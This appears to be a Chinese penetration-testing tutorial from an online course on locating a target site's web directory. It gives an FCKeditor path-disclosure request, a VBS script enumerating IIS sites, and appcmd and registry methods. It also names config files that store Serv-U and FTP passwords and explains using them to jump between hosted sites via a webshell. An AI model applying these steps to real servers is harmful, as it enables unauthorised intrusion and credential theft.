渗透测试 - 如何找到目标站目录 - cracer哔哩哔哩
如何找到目标站目录
1. 没有权限 通过爆路径,
找网站目录
a. 一些常见phpweb程序都有爆路径的洞
b. phpmyadmin爆路径
c .phpinfo.php等测试网站脚本运行正常的脚本
d. fck编辑器爆绝对路径:
FCKeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=File&CurrentFolder=%2F&NewFolderName=aux
shell权限
Windows:c:\windows\php.ini php配置文件
c:\windows\system32\inetsrv\MetaBase.xml IIS虚拟主机配置文件
C:\Program Files\RhinoSoft.com\Serv-U\c:\Program Files\Serv-U\ServUDaemon.ini 中存储了虚拟主机网站路径和密码
通过copy iis6.0配置文件找网站的路径
如果是服务器权限 直接利用搜索目标网站的唯一图片路径找到目标网站路径
过vbs
0x01查看iis配置文件
0x02 通过注册表找到目录列表
0x03 通过dir或者for命令
0x04 appcmd在渗透中的应用
0x05 win和linux配置文件找路径
0x05 win和linux配置文件找路径
各平台下Web服务器和PHP的配置文件默认路径可以上网查,这里列举常见的几个。
x01 通过vbs查看iis配置文件
脚本如下:
Set ObjService=GetObject("IIS://LocalHost/W3SVC")
For Each obj3w In objservice
If IsNumeric(obj3w.Name) Then
sServerName=Obj3w.ServerComment
Set webSite = GetObject("IIS://Localhost/W3SVC/" & obj3w.Name & "/Root")
ListAllWeb = ListAllWeb & obj3w.Name & String(25-Len(obj3w.Name)," ") & obj3w.ServerComment & "(" & webSite.Path & ")" & vbCrLf
End If
Next
WScript.Echo ListAllWeb
Set ObjService=Nothing
WScript.Quit
执行命令:cscript C:\xxx\列目录.vbs
这是通过查看iis配置文件获取目标站信息。
基本信息是网站id,网站名称,网站路径
这里还介绍一款vbs,可以列出网站的iis用户名和密码,然后使用bs大牛写的webshell来跨目录。
Adsutil.vbs
0x02 通过注册表找到目录列表
注册表位置:HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\MSFtpsvc\Parameters\Virtual Roots
0x03 通过dir或者for命令
首先是dir命令,可能很多机油觉得虚拟主机上一般是没有dir命令权限。
但是我实战中却却常常能够碰见:
dir d:\wwwroot\如图:
虽然不能访问d:\wwwroot\这个目录,但是却能列出详细信息
for命令对用户权限要求是最低的,大多数情况下是可以执行了for /d %i in (d:\wwwroot\*) do @echo %i
如图:
0x04 appcmd在渗透中的应用
appcmd是微软iis7的一款命令行下的管理web的工具。他的使用可以在渗透中取得一些关键应用
这里我就讲对web渗透实用的几个命令。其他的命令我都测试过了,基本是权限不够。
appcmd list site
列出站点及其id号:
第二个命令:
appcmd list config
列出所有网站配置信息,如果是在iis7上配置的ftp,则还会列出网站ftp用户及密码
第三条命令:
appcmd list vdir
该条命令可以列出id号和所有站点的目录:
第二条命令可以直接找到对应站点的ftp和iis密码,可以联合bs牛的马直接跨到目标站点目录。
appcmd list cmd
appcmd list vdir
